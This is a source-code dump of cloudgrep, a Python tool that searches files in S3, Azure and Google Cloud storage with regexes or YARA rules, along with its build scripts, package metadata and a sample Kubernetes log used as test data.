len(sys.argv) == 1: 52 | parser.print_help(sys.stderr) 53 | sys.exit(1) 54 | 55 | # Parse dates (if provided) into datetime objects 56 | start_date: Optional["datetime.datetime"] = dateutil.parser.parse(args.start_date) if args.start_date else None 57 | end_date: Optional["datetime.datetime"] = dateutil.parser.parse(args.end_date) if args.end_date else None 58 | 59 | # Configure logging 60 | if args.debug: 61 | logging.basicConfig(format="[%(asctime)s] [%(levelname)s] %(message)s", level=logging.DEBUG) 62 | else: 63 | logging.basicConfig(format="[%(asctime)s] %(message)s", level=logging.WARNING) 64 | logging.getLogger("urllib3.connectionpool").setLevel(logging.ERROR) 65 | 66 | CloudGrep().search( 67 | bucket=args.bucket, 68 | account_name=args.account_name, 69 | container_name=args.container_name, 70 | google_bucket=args.google_bucket, 71 | query=args.query, 72 | file=args.file, 73 | yara_file=args.yara, 74 | file_size=args.file_size, 75 | prefix=args.prefix, 76 | key_contains=args.filename, 77 | from_date=start_date, 78 | end_date=end_date, 79 | hide_filenames=args.hide_filenames, 80 | log_type=args.log_type, 81 | log_format=args.log_format, 82 | log_properties=args.log_properties, 83 | profile=args.profile, 84 | json_output=args.json_output, 85 | ) 86 | 87 | 88 | if __name__ == "__main__": 89 | main() 90 | -------------------------------------------------------------------------------- /cloudgrep/cloud.py: -------------------------------------------------------------------------------- 1 | import boto3 2 | import os 3 | from azure.storage.blob import BlobServiceClient 4 | from 
azure.identity import DefaultAzureCredential 5 | from azure.core.exceptions import ResourceNotFoundError 6 | from google.cloud import storage # type: ignore 7 | from datetime import datetime 8 | import botocore 9 | import concurrent.futures 10 | import tempfile 11 | from typing import Iterator, Optional, List, Any, Tuple 12 | import logging 13 | from cloudgrep.search import Search 14 | 15 | class Cloud: 16 | def __init__(self) -> None: 17 | self.search = Search() 18 | 19 | def _download_and_search_in_parallel(self, files: List[Any], worker_func: Any) -> int: 20 | """Use ThreadPoolExecutor to download every file 21 | Returns number of matched files""" 22 | total_matched = 0 23 | max_workers = 10 # limit cpu/memory pressure 24 | with concurrent.futures.ThreadPoolExecutor(max_workers=max_workers) as executor: 25 | for result in executor.map(worker_func, files): 26 | total_matched += result 27 | return total_matched 28 | 29 | def _download_to_temp(self) -> str: 30 | """Return a temporary filename""" 31 | with tempfile.NamedTemporaryFile(delete=False) as tmp: 32 | tmp.close() 33 | return tmp.name 34 | 35 | def download_from_s3_multithread( 36 | self, 37 | bucket: str, 38 | files: List[str], 39 | query: List[str], 40 | hide_filenames: bool, 41 | yara_rules: Any, 42 | log_format: Optional[str] = None, 43 | log_properties: List[str] = [], 44 | json_output: Optional[bool] = False, 45 | ) -> int: 46 | """Download and search files from AWS S3""" 47 | if log_properties is None: 48 | log_properties = [] 49 | s3 = boto3.client("s3", config=botocore.config.Config(max_pool_connections=64)) 50 | 51 | def _download_search_s3(key: str) -> int: 52 | tmp_name = self._download_to_temp() 53 | try: 54 | logging.info(f"Downloading s3://{bucket}/{key} to {tmp_name}") 55 | s3.download_file(bucket, key, tmp_name) 56 | matched = self.search.search_file( 57 | tmp_name, key, query, hide_filenames, yara_rules, log_format, log_properties, json_output 58 | ) 59 | return 1 if matched else 0 60 | except Exception: 61 | logging.exception(f"Error processing {key}") 62 | return 0 63 | finally: 64 | try: 65 | os.remove(tmp_name) 66 | except OSError: 67 | pass 68 | 69 | return self._download_and_search_in_parallel(files, _download_search_s3) 70 | 71 | def download_from_azure( 72 | self, 73 | account_name: str, 74 | container_name: str, 75 | files: List[str], 76 | query: List[str], 77 | hide_filenames: bool, 78 | yara_rules: Any, 79 | log_format: Optional[str] = None, 80 | log_properties: Optional[List[str]] = None, 81 | json_output: bool = False, 82 | ) -> int: 83 | """Download and search files from Azure Storage""" 84 | if log_properties is None: 85 | log_properties = [] 86 | default_credential = DefaultAzureCredential() 87 | connection_str = f"DefaultEndpointsProtocol=https;AccountName={account_name};EndpointSuffix=core.windows.net" 88 | blob_service_client = BlobServiceClient.from_connection_string(connection_str, credential=default_credential) 89 | container_client = blob_service_client.get_container_client(container_name) 90 | 91 | def _download_search_azure(key: str) -> int: 92 | tmp_name = self._download_to_temp() 93 | try: 94 | logging.info(f"Downloading azure://{account_name}/{container_name}/{key} to {tmp_name}") 95 | blob_client = container_client.get_blob_client(key) 96 | with open(tmp_name, "wb") as out_file: 97 | stream = blob_client.download_blob() 98 | stream.readinto(out_file) 99 | matched = self.search.search_file( 100 | tmp_name, 101 | key, 102 | query, 103 | hide_filenames, 104 | yara_rules, 105 | log_format, 
106 | log_properties, 107 | json_output, 108 | account_name, 109 | ) 110 | return 1 if matched else 0 111 | except ResourceNotFoundError: 112 | logging.info(f"File {key} not found in {account_name}/{container_name}") 113 | return 0 114 | except Exception: 115 | logging.exception(f"Error processing {key}") 116 | return 0 117 | finally: 118 | try: 119 | os.remove(tmp_name) 120 | except OSError: 121 | pass 122 | 123 | return self._download_and_search_in_parallel(files, _download_search_azure) 124 | 125 | def download_from_google( 126 | self, 127 | bucket: str, 128 | blobs: List[Tuple[str, Any]], 129 | query: List[str], 130 | hide_filenames: bool, 131 | yara_rules: Any, 132 | log_format: Optional[str] = None, 133 | log_properties: Optional[List[str]] = None, 134 | json_output: bool = False, 135 | ) -> int: 136 | """Download and search files from Google Cloud Storage""" 137 | if log_properties is None: 138 | log_properties = [] 139 | 140 | def _download_and_search_google(item: Tuple[str, Any]) -> int: 141 | key, blob = item 142 | tmp_name = self._download_to_temp() 143 | try: 144 | logging.info(f"Downloading gs://{bucket}/{key} to {tmp_name}") 145 | blob.download_to_filename(tmp_name) 146 | matched = self.search.search_file( 147 | tmp_name, key, query, hide_filenames, yara_rules, log_format, log_properties, json_output 148 | ) 149 | return 1 if matched else 0 150 | except Exception: 151 | logging.exception(f"Error processing {key}") 152 | return 0 153 | finally: 154 | try: 155 | os.remove(tmp_name) 156 | except OSError: 157 | pass 158 | 159 | return self._download_and_search_in_parallel(blobs, _download_and_search_google) 160 | 161 | def get_objects( 162 | self, 163 | bucket: str, 164 | prefix: Optional[str], 165 | key_contains: Optional[str], 166 | from_date: Optional[datetime], 167 | end_date: Optional[datetime], 168 | file_size: int, 169 | max_matches: int = 1000000 # generous default 170 | ) -> Iterator[str]: 171 | """Yield a maximum of max_matches objects that match filter""" 172 | # Reuse the S3 client if already created; otherwise, create one 173 | if not hasattr(self, "s3_client"): 174 | self.s3_client = boto3.client("s3") 175 | paginator = self.s3_client.get_paginator("list_objects_v2") 176 | count = 0 177 | for page in paginator.paginate( 178 | Bucket=bucket, 179 | Prefix=prefix, 180 | PaginationConfig={'PageSize': 1000} 181 | ): 182 | for obj in page.get("Contents", []): 183 | if self.filter_object(obj, key_contains, from_date, end_date, file_size): 184 | yield obj.get("Key") 185 | count += 1 186 | if count >= max_matches: 187 | return 188 | 189 | def get_azure_objects( 190 | self, 191 | account_name: str, 192 | container_name: str, 193 | prefix: Optional[str], 194 | key_contains: Optional[str], 195 | from_date: Optional[datetime], 196 | end_date: Optional[datetime], 197 | file_size: int, 198 | ) -> Iterator[str]: 199 | """Yield Azure blob names that match the filter""" 200 | default_credential = DefaultAzureCredential() 201 | connection_str = f"DefaultEndpointsProtocol=https;AccountName={account_name};EndpointSuffix=core.windows.net" 202 | blob_service_client = BlobServiceClient.from_connection_string(connection_str, credential=default_credential) 203 | container_client = blob_service_client.get_container_client(container_name) 204 | for blob in container_client.list_blobs(name_starts_with=prefix): 205 | if self.filter_object_azure(blob, key_contains, from_date, end_date, file_size): 206 | yield blob.name 207 | 208 | def get_google_objects( 209 | self, 210 | bucket: str, 211 | 
prefix: Optional[str], 212 | key_contains: Optional[str], 213 | from_date: Optional[datetime], 214 | end_date: Optional[datetime], 215 | ) -> Iterator[Tuple[str, Any]]: 216 | """Yield (blob_name, blob) for blobs in GCP that match filter""" 217 | client = storage.Client() 218 | bucket_gcp = client.get_bucket(bucket) 219 | for blob in bucket_gcp.list_blobs(prefix=prefix): 220 | if self.filter_object_google(blob, key_contains, from_date, end_date): 221 | yield blob.name, blob 222 | 223 | def filter_object( 224 | self, 225 | obj: dict, 226 | key_contains: Optional[str], 227 | from_date: Optional[datetime], 228 | to_date: Optional[datetime], 229 | file_size: int, 230 | ) -> bool: 231 | """Filter an S3 object based on modification date, size, and key substring""" 232 | last_modified = obj.get("LastModified") 233 | if last_modified: 234 | if from_date and last_modified < from_date: 235 | return False 236 | if to_date and last_modified > to_date: 237 | return False 238 | # If size is 0 or greater than file_size, skip 239 | if int(obj.get("Size", 0)) == 0 or int(obj.get("Size", 0)) > file_size: 240 | return False 241 | if key_contains and key_contains not in obj.get("Key", ""): 242 | return False 243 | return True 244 | 245 | def filter_object_azure( 246 | self, 247 | obj: Any, 248 | key_contains: Optional[str], 249 | from_date: Optional[datetime], 250 | to_date: Optional[datetime], 251 | file_size: int, 252 | ) -> bool: 253 | """ 254 | Filter an Azure blob object (or dict) based on modification date, size, and name substring. 255 | """ 256 | if isinstance(obj, dict): 257 | last_modified = obj.get("last_modified") 258 | size = int(obj.get("size", 0)) 259 | name = obj.get("name", "") 260 | else: 261 | last_modified = getattr(obj, "last_modified", None) 262 | size = int(getattr(obj, "size", 0)) 263 | name = getattr(obj, "name", "") 264 | if last_modified: 265 | if from_date and last_modified < from_date: 266 | return False 267 | if to_date and last_modified > to_date: 268 | return False 269 | if size == 0 or size > file_size: 270 | return False 271 | if key_contains and key_contains not in name: 272 | return False 273 | return True 274 | 275 | def filter_object_google( 276 | self, 277 | obj: storage.blob.Blob, 278 | key_contains: Optional[str], 279 | from_date: Optional[datetime], 280 | to_date: Optional[datetime], 281 | ) -> bool: 282 | """Filter a GCP blob based on update time and name substring""" 283 | last_modified = getattr(obj, "updated", None) 284 | if last_modified: 285 | if from_date and last_modified < from_date: 286 | return False 287 | if to_date and last_modified > to_date: 288 | return False 289 | if key_contains and key_contains not in getattr(obj, "name", ""): 290 | return False 291 | return True 292 | -------------------------------------------------------------------------------- /cloudgrep/cloudgrep.py: -------------------------------------------------------------------------------- 1 | import boto3 2 | from datetime import datetime 3 | from typing import Optional, List, Any, Dict 4 | import logging 5 | import yara # type: ignore 6 | 7 | from cloudgrep.cloud import Cloud 8 | 9 | 10 | class CloudGrep: 11 | def __init__(self) -> None: 12 | self.cloud = Cloud() 13 | 14 | def load_queries(self, file_path: str) -> List[str]: 15 | with open(file_path, "r", encoding="utf-8") as f: 16 | return [line.strip() for line in f if line.strip()] 17 | 18 | def list_files( 19 | self, 20 | bucket: Optional[str], 21 | account_name: Optional[str], 22 | container_name: Optional[str], 23 | 
google_bucket: Optional[str], 24 | prefix: Optional[str] = "", 25 | key_contains: Optional[str] = None, 26 | from_date: Optional[datetime] = None, 27 | end_date: Optional[datetime] = None, 28 | file_size: int = 100_000_000, # 100MB 29 | ) -> Dict[str, List[Any]]: 30 | """ 31 | Returns a dictionary of matching files for each cloud provider. 32 | 33 | The returned dict has the following keys: 34 | - "s3": a list of S3 object keys that match filters 35 | - "azure": a list of Azure blob names that match filters 36 | - "gcs": a list of tuples (blob name, blob) for Google Cloud Storage that match filters 37 | """ 38 | files = {} 39 | if bucket: 40 | files["s3"] = list(self.cloud.get_objects(bucket, prefix, key_contains, from_date, end_date, file_size)) 41 | if account_name and container_name: 42 | files["azure"] = list( 43 | self.cloud.get_azure_objects( 44 | account_name, container_name, prefix, key_contains, from_date, end_date, file_size 45 | ) 46 | ) 47 | if google_bucket: 48 | # Keep the (name, blob) tuples so this matches the docstring and download_from_google 49 | files["gcs"] = list(self.cloud.get_google_objects(google_bucket, prefix, key_contains, from_date, end_date)) 50 | return files 51 | 52 | def search( 53 | self, 54 | bucket: Optional[str], 55 | account_name: Optional[str], 56 | container_name: Optional[str], 57 | google_bucket: Optional[str], 58 | query: Optional[List[str]], 59 | file: Optional[str], 60 | yara_file: Optional[str], 61 | file_size: int, 62 | prefix: Optional[str] = "", 63 | key_contains: Optional[str] = None, 64 | from_date: Optional[datetime] = None, 65 | end_date: Optional[datetime] = None, 66 | hide_filenames: bool = False, 67 | log_type: Optional[str] = None, 68 | log_format: Optional[str] = None, 69 | log_properties: Optional[List[str]] = None, 70 | profile: Optional[str] = None, 71 | json_output: bool = False, 72 | files: Optional[Dict[str, List[Any]]] = None, 73 | ) -> None: 74 | """ 75 | Searches the contents of files matching the given queries. 76 | 77 | If the optional `files` parameter is provided (a dict with keys such as "s3", "azure", or "gcs") 78 | then the search will use those file lists instead of applying the filters again. 79 | """ 80 | if not query and file: 81 | logging.debug(f"Loading queries from {file}") 82 | query = self.load_queries(file) 83 | if not query: 84 | logging.error("No query provided. Exiting.") 85 | return 86 | 87 | yara_rules = None 88 | if yara_file: 89 | logging.debug(f"Compiling yara rules from {yara_file}") 90 | yara_rules = yara.compile(filepath=yara_file) 91 | 92 | if profile: 93 | boto3.setup_default_session(profile_name=profile) 94 | 95 | if log_type: 96 | if log_type.lower() == "cloudtrail": 97 | log_format = "json" 98 | log_properties = ["Records"] 99 | elif log_type.lower() == "azure": 100 | log_format = "json" 101 | log_properties = ["data"] 102 | else: 103 | logging.error(f"Invalid log_type: {log_type}") 104 | return 105 | if log_properties is None: 106 | log_properties = [] 107 | 108 | if bucket: 109 | if files and "s3" in files: 110 | matching_keys = files["s3"] 111 | else: 112 | matching_keys = list( 113 | self.cloud.get_objects(bucket, prefix, key_contains, from_date, end_date, file_size) 114 | ) 115 | s3_client = boto3.client("s3") 116 | region = s3_client.get_bucket_location(Bucket=bucket).get("LocationConstraint", "unknown") 117 | logging.warning(f"Bucket region: {region}. 
(Search from the same region to avoid egress charges.)") 117 | logging.warning(f"Searching {len(matching_keys)} files in {bucket} for {query}...") 118 | self.cloud.download_from_s3_multithread( 119 | bucket, matching_keys, query, hide_filenames, yara_rules, log_format, log_properties, json_output 120 | ) 121 | 122 | if account_name and container_name: 123 | if files and "azure" in files: 124 | matching_keys = files["azure"] 125 | else: 126 | matching_keys = list( 127 | self.cloud.get_azure_objects( 128 | account_name, container_name, prefix, key_contains, from_date, end_date, file_size 129 | ) 130 | ) 131 | logging.info(f"Searching {len(matching_keys)} files in {account_name}/{container_name} for {query}...") 132 | self.cloud.download_from_azure( 133 | account_name, 134 | container_name, 135 | matching_keys, 136 | query, 137 | hide_filenames, 138 | yara_rules, 139 | log_format, 140 | log_properties, 141 | json_output, 142 | ) 143 | 144 | if google_bucket: 145 | if files and "gcs" in files: 146 | matching_blobs = files["gcs"] 147 | else: 148 | matching_blobs = list( 149 | self.cloud.get_google_objects(google_bucket, prefix, key_contains, from_date, end_date) 150 | ) 151 | logging.info(f"Searching {len(matching_blobs)} files in {google_bucket} for {query}...") 152 | self.cloud.download_from_google( 153 | google_bucket, 154 | matching_blobs, 155 | query, 156 | hide_filenames, 157 | yara_rules, 158 | log_format, 159 | log_properties, 160 | json_output, 161 | ) 162 | -------------------------------------------------------------------------------- /cloudgrep/queries.txt: -------------------------------------------------------------------------------- 1 | query1 2 | query2 3 | query3 -------------------------------------------------------------------------------- /cloudgrep/search.py: -------------------------------------------------------------------------------- 1 | import re 2 | from typing import Optional, List, Any, Iterator, Iterable 3 | import logging 4 | import gzip 5 | import zipfile 6 | import json 7 | import csv 8 | import io 9 | 10 | class Search: 11 | def get_all_strings_line(self, file_path: str) -> Iterator[str]: 12 | """Yield lines from a file without loading into memory""" 13 | with open(file_path, "r", encoding="utf-8", errors="ignore") as f: 14 | for line in f: 15 | yield line 16 | 17 | def print_match(self, match_info: dict, hide_filenames: bool, json_output: Optional[bool]) -> None: 18 | output = match_info.copy() 19 | if hide_filenames: 20 | output.pop("key_name", None) 21 | if json_output: 22 | try: 23 | print(json.dumps(output)) 24 | except TypeError: 25 | print(str(output)) 26 | else: 27 | line = output.get("line", "") 28 | if "match_rule" in output: 29 | line = f"{output['match_rule']}: {output.get('match_strings', '')}" 30 | print(f"{output.get('key_name', '')}: {line}" if not hide_filenames else line) 31 | 32 | def parse_logs(self, line: str, log_format: Optional[str]) -> Any: 33 | if log_format == "json": 34 | try: 35 | return json.loads(line) 36 | except json.JSONDecodeError as e: 37 | logging.error(f"JSON decode error in line: {line} ({e})") 38 | elif log_format == "csv": 39 | try: 40 | return list(csv.DictReader([line])) 41 | except csv.Error as e: 42 | logging.error(f"CSV parse error in line: {line} ({e})") 43 | elif log_format: 44 | logging.error(f"Unsupported log format: {log_format}") 45 | return None 46 | 47 | def extract_log_entries(self, parsed: Any, log_properties: List[str]) -> List[Any]: 48 | if log_properties and isinstance(parsed, dict): 49 | for prop 
in log_properties: 50 | parsed = parsed.get(prop, None) 51 | if parsed is None: 52 | break 53 | if isinstance(parsed, list): 54 | return parsed 55 | elif parsed is not None: 56 | return [parsed] 57 | return [] 58 | 59 | def search_logs( 60 | self, 61 | line: str, 62 | key_name: str, 63 | search: str, 64 | hide_filenames: bool, 65 | log_format: Optional[str] = None, 66 | log_properties: List[str] = [], 67 | json_output: Optional[bool] = False, 68 | ) -> None: 69 | """Search log records in parsed logs""" 70 | parsed = self.parse_logs(line, log_format) 71 | if not parsed: 72 | return 73 | for entry in self.extract_log_entries(parsed, log_properties): 74 | entry_str = json.dumps(entry) 75 | if re.search(search, entry_str): 76 | self.print_match({"key_name": key_name, "query": search, "line": entry}, hide_filenames, json_output) 77 | 78 | def search_line( 79 | self, 80 | key_name: str, 81 | compiled_patterns: List[re.Pattern], 82 | hide_filenames: bool, 83 | line: str, 84 | log_format: Optional[str], 85 | log_properties: List[str] = [], 86 | json_output: Optional[bool] = False, 87 | ) -> bool: 88 | """Regex search of the line""" 89 | found = False 90 | for regex in compiled_patterns: 91 | if regex.search(line): 92 | if log_format: 93 | self.search_logs(line, key_name, regex.pattern, hide_filenames, log_format, log_properties, json_output) 94 | else: 95 | self.print_match( 96 | {"key_name": key_name, "query": regex.pattern, "line": line}, hide_filenames, json_output 97 | ) 98 | found = True 99 | return found 100 | 101 | def yara_scan_file( 102 | self, file_name: str, key_name: str, hide_filenames: bool, yara_rules: Any, json_output: Optional[bool] = False 103 | ) -> bool: 104 | """Run Yara scan on a file""" 105 | matches = yara_rules.match(file_name) 106 | for match in matches: 107 | self.print_match( 108 | {"key_name": key_name, "match_rule": match.rule, "match_strings": match.strings}, 109 | hide_filenames, 110 | json_output, 111 | ) 112 | return bool(matches) 113 | 114 | def search_file( 115 | self, 116 | file_name: str, 117 | key_name: str, 118 | patterns: List[str], 119 | hide_filenames: bool, 120 | yara_rules: Any, 121 | log_format: Optional[str] = None, 122 | log_properties: List[str] = [], 123 | json_output: Optional[bool] = False, 124 | account_name: Optional[str] = None, 125 | ) -> bool: 126 | """Regex search of the file line by line""" 127 | logging.info(f"Searching {file_name} for patterns: {patterns}") 128 | if yara_rules: 129 | return self.yara_scan_file(file_name, key_name, hide_filenames, yara_rules, json_output) 130 | 131 | compiled_patterns = [re.compile(p) for p in patterns] 132 | 133 | def process_lines(lines: Iterable[str]) -> bool: 134 | return any( 135 | self.search_line(key_name, compiled_patterns, hide_filenames, line, log_format, log_properties, json_output) 136 | for line in lines 137 | ) 138 | 139 | if file_name.endswith(".gz"): 140 | try: 141 | with gzip.open(file_name, "rt", encoding="utf-8", errors="ignore") as f: 142 | if account_name: 143 | data = json.load(f) 144 | return process_lines(data) 145 | else: 146 | return process_lines(f) 147 | except Exception: 148 | logging.exception(f"Error processing gzip file: {file_name}") 149 | return False 150 | elif file_name.endswith(".zip"): 151 | matched_any = False 152 | try: 153 | with zipfile.ZipFile(file_name, "r") as zf: 154 | for zip_info in zf.infolist(): 155 | if zip_info.is_dir(): 156 | continue 157 | with zf.open(zip_info) as file_obj: 158 | # Wrap the binary stream as text 159 | with io.TextIOWrapper(file_obj, 
encoding="utf-8", errors="ignore") as f: 160 | if account_name: 161 | try: 162 | data = json.load(f) 163 | if process_lines(data): 164 | matched_any = True 165 | except Exception: 166 | logging.exception(f"Error processing json in zip member: {zip_info.filename}") 167 | else: 168 | if process_lines(f): 169 | matched_any = True 170 | return matched_any 171 | except Exception: 172 | logging.exception(f"Error processing zip file: {file_name}") 173 | return False 174 | else: 175 | try: 176 | return process_lines(self.get_all_strings_line(file_name)) 177 | except Exception: 178 | logging.exception(f"Error processing file: {file_name}") 179 | return False 180 | -------------------------------------------------------------------------------- /readme/Diagram.png: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/cado-security/cloudgrep/7f22e3a4f7131d6ecc7693197a2cd78186147278/readme/Diagram.png -------------------------------------------------------------------------------- /release/generate_linux_binary.sh: -------------------------------------------------------------------------------- 1 | # Run with ./release/generate_linux_binary.sh 2 | pwd 3 | ls 4 | pip3 install -r requirements.txt 5 | pyinstaller --onefile --name cloudgrep --clean ./cloudgrep/__main__.py 6 | -------------------------------------------------------------------------------- /release/generate_osx_binary.sh: -------------------------------------------------------------------------------- 1 | # Tested with python 3.10 and PyInstaller 5.4.1 2 | # Run with ./release/generate_linux_binary.sh 3 | pwd 4 | ls 5 | pip3 install -r requirements.txt 6 | pyinstaller --onefile --clean --target-arch universal2 ./cloudgrep/cloudgrep.py 7 | -------------------------------------------------------------------------------- /release/generate_windows_binary.bat: -------------------------------------------------------------------------------- 1 | dir 2 | python3 -m pip install -r ../requirements.txt 3 | python3 -m PyInstaller --name cloudgrep --onefile ../cloudgrep/__main__.py 4 | -------------------------------------------------------------------------------- /requirements.txt: -------------------------------------------------------------------------------- 1 | botocore>=1.36.9 2 | boto3>=1.36.9 3 | boto3-stubs>=1.36.9 4 | python-dateutil==2.8.1 5 | types-python-dateutil==2.8.13 6 | pytest==7.2.0 7 | moto==5.0.27 8 | timeout-decorator==0.5.0 9 | black==24.3.0 10 | pip-audit==2.6.1 11 | azure-storage-blob==12.18.3 12 | azure-core==1.29.4 13 | azure-identity==1.16.1 14 | google-cloud-storage==2.12.0 15 | setuptools==70.0.0 16 | yara-python-wheel==4.4.0 17 | -------------------------------------------------------------------------------- /setup.cfg: -------------------------------------------------------------------------------- 1 | [metadata] 2 | name = cloudgrep 3 | description = cloudgrep: searches cloud storage. 
4 | version = 1.0.5 5 | long_description = file: README.md 6 | long_description_content_type = text/markdown 7 | author = Cado Security and Contributors 8 | license = Apache License 9 | license_files = LICENSE 10 | classifiers = 11 | Intended Audience :: Developers 12 | Operating System :: POSIX 13 | Programming Language :: Python :: 3 14 | Programming Language :: Python :: 3 :: Only 15 | Programming Language :: Python :: 3.8 16 | Programming Language :: Python :: 3.9 17 | Programming Language :: Python :: 3.10 18 | Programming Language :: Python :: 3.11 19 | Programming Language :: Python :: 3.12 20 | Topic :: Software Development :: Libraries 21 | Topic :: Utilities 22 | 23 | [options] 24 | packages = 25 | cloudgrep 26 | install_requires = 27 | botocore==1.24.46 28 | boto3==1.21.24 29 | boto3-stubs==1.20.49 30 | python-dateutil==2.8.1 31 | types-python-dateutil==2.8.13 32 | pytest==7.2.0 33 | moto==4.2.2 34 | timeout-decorator==0.5.0 35 | black==23.9.1 36 | pip-audit==2.6.1 37 | azure-storage-blob==12.18.3 38 | azure-core==1.29.4 39 | azure-identity==1.14.1 40 | google-cloud-storage==2.12.0 41 | python_requires = >=3.8 42 | zip_safe = yes 43 | 44 | [options.entry_points] 45 | console_scripts = 46 | cloudgrep=cloudgrep.__main__:main 47 | 48 | [options.extras_require] 49 | testing = 50 | pytest==7.2.0 51 | 52 | 53 | [devpi:upload] 54 | formats = sdist.tgz,bdist_wheel 55 | -------------------------------------------------------------------------------- /setup.py: -------------------------------------------------------------------------------- 1 | # read the contents of your README file 2 | from pathlib import Path 3 | 4 | from setuptools import find_packages, setup # type: ignore 5 | 6 | this_directory = Path(__file__).parent 7 | long_description = (this_directory / "README.md").read_text() 8 | 9 | 10 | VERSION = "1.0.5" 11 | 12 | setup( 13 | name="cloudgrep", 14 | version=VERSION, 15 | description="cloudgrep searches cloud storage", 16 | long_description=long_description, 17 | long_description_content_type="text/markdown", 18 | author="Cado Security", 19 | author_email="cloudgrep@cadosecurity.com", 20 | url="https://github.com/cado-security/cloudgrep", 21 | download_url="https://github.com/cado-security/cloudgrep/archive/refs/heads/main.zip", 22 | py_modules=["cloudgrep"], 23 | install_requires=[ 24 | "botocore", 25 | "boto3", 26 | "python-dateutil", 27 | "azure-storage-blob", 28 | "azure-core", 29 | "azure-identity", 30 | "google-cloud-storage", 31 | "yara-python-wheel", 32 | ], 33 | packages=find_packages(), 34 | ) 35 | -------------------------------------------------------------------------------- /tests/__init__.py: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/cado-security/cloudgrep/7f22e3a4f7131d6ecc7693197a2cd78186147278/tests/__init__.py -------------------------------------------------------------------------------- /tests/data/000000: -------------------------------------------------------------------------------- 1 | 2021-07-10T20:27:23.000Z I0710 20:27:23.782909 1 flags.go:59] FLAG: --add-dir-header="false" 2 | 2021-07-10T20:27:23.000Z I0710 20:27:23.783038 1 flags.go:59] FLAG: --address="127.0.0.1" 3 | 2021-07-10T20:27:23.000Z I0710 20:27:23.783055 1 flags.go:59] FLAG: --allocate-node-cidrs="false" 4 | 2021-07-10T20:27:23.000Z I0710 20:27:23.783062 1 flags.go:59] FLAG: --allow-untagged-cloud="false" 5 | 2021-07-10T20:27:23.000Z I0710 20:27:23.783066 1 flags.go:59] FLAG: --alsologtostderr="false" 6 |
2021-07-10T20:27:23.000Z I0710 20:27:23.783070 1 flags.go:59] FLAG: --attach-detach-reconcile-sync-period="1m0s" 7 | 2021-07-10T20:27:23.000Z I0710 20:27:23.783075 1 flags.go:59] FLAG: --authentication-kubeconfig="" 8 | 2021-07-10T20:27:23.000Z I0710 20:27:23.783080 1 flags.go:59] FLAG: --authentication-skip-lookup="false" 9 | 2021-07-10T20:27:23.000Z I0710 20:27:23.783084 1 flags.go:59] FLAG: --authentication-token-webhook-cache-ttl="10s" 10 | 2021-07-10T20:27:23.000Z I0710 20:27:23.783087 1 flags.go:59] FLAG: --authentication-tolerate-lookup-failure="false" 11 | 2021-07-10T20:27:23.000Z I0710 20:27:23.783091 1 flags.go:59] FLAG: --authorization-always-allow-paths="[/healthz]" 12 | 2021-07-10T20:27:23.000Z I0710 20:27:23.783104 1 flags.go:59] FLAG: --authorization-kubeconfig="" 13 | 2021-07-10T20:27:23.000Z I0710 20:27:23.783108 1 flags.go:59] FLAG: --authorization-webhook-cache-authorized-ttl="10s" 14 | 2021-07-10T20:27:23.000Z I0710 20:27:23.783112 1 flags.go:59] FLAG: --authorization-webhook-cache-unauthorized-ttl="10s" 15 | 2021-07-10T20:27:23.000Z I0710 20:27:23.783116 1 flags.go:59] FLAG: --bind-address="0.0.0.0" 16 | 2021-07-10T20:27:23.000Z I0710 20:27:23.783121 1 flags.go:59] FLAG: --cert-dir="" 17 | 2021-07-10T20:27:23.000Z I0710 20:27:23.783124 1 flags.go:59] FLAG: --cidr-allocator-type="RangeAllocator" 18 | 2021-07-10T20:27:23.000Z I0710 20:27:23.783128 1 flags.go:59] FLAG: --client-ca-file="" 19 | 2021-07-10T20:27:23.000Z I0710 20:27:23.783131 1 flags.go:59] FLAG: --cloud-config="/var/lib/kubernetes/aws.config" 20 | 2021-07-10T20:27:23.000Z I0710 20:27:23.783136 1 flags.go:59] FLAG: --cloud-provider="aws" 21 | 2021-07-10T20:27:23.000Z I0710 20:27:23.783139 1 flags.go:59] FLAG: --cloud-provider-gce-lb-src-cidrs="130.211.0.0/22,209.85.152.0/22,209.85.204.0/22,35.191.0.0/16" 22 | 2021-07-10T20:27:23.000Z I0710 20:27:23.783156 1 flags.go:59] FLAG: --cluster-cidr="10.200.0.0/16" 23 | 2021-07-10T20:27:23.000Z I0710 20:27:23.783162 1 flags.go:59] FLAG: --cluster-name="kubernetes" 24 | 2021-07-10T20:27:23.000Z I0710 20:27:23.783166 1 flags.go:59] FLAG: --cluster-signing-cert-file="" 25 | 2021-07-10T20:27:23.000Z I0710 20:27:23.783170 1 flags.go:59] FLAG: --cluster-signing-duration="8760h0m0s" 26 | 2021-07-10T20:27:23.000Z I0710 20:27:23.783174 1 flags.go:59] FLAG: --cluster-signing-key-file="" 27 | 2021-07-10T20:27:23.000Z I0710 20:27:23.783178 1 flags.go:59] FLAG: --cluster-signing-kube-apiserver-client-cert-file="" 28 | 2021-07-10T20:27:23.000Z I0710 20:27:23.783181 1 flags.go:59] FLAG: --cluster-signing-kube-apiserver-client-key-file="" 29 | 2021-07-10T20:27:23.000Z I0710 20:27:23.783185 1 flags.go:59] FLAG: --cluster-signing-kubelet-client-cert-file="" 30 | 2021-07-10T20:27:23.000Z I0710 20:27:23.783188 1 flags.go:59] FLAG: --cluster-signing-kubelet-client-key-file="" 31 | 2021-07-10T20:27:23.000Z I0710 20:27:23.783191 1 flags.go:59] FLAG: --cluster-signing-kubelet-serving-cert-file="" 32 | 2021-07-10T20:27:23.000Z I0710 20:27:23.783195 1 flags.go:59] FLAG: --cluster-signing-kubelet-serving-key-file="" 33 | 2021-07-10T20:27:23.000Z I0710 20:27:23.783198 1 flags.go:59] FLAG: --cluster-signing-legacy-unknown-cert-file="" 34 | 2021-07-10T20:27:23.000Z I0710 20:27:23.783201 1 flags.go:59] FLAG: --cluster-signing-legacy-unknown-key-file="" 35 | 2021-07-10T20:27:23.000Z I0710 20:27:23.783205 1 flags.go:59] FLAG: --concurrent-deployment-syncs="5" 36 | 2021-07-10T20:27:23.000Z I0710 20:27:23.783211 1 flags.go:59] FLAG: --concurrent-endpoint-syncs="5" 37 | 2021-07-10T20:27:23.000Z I0710 
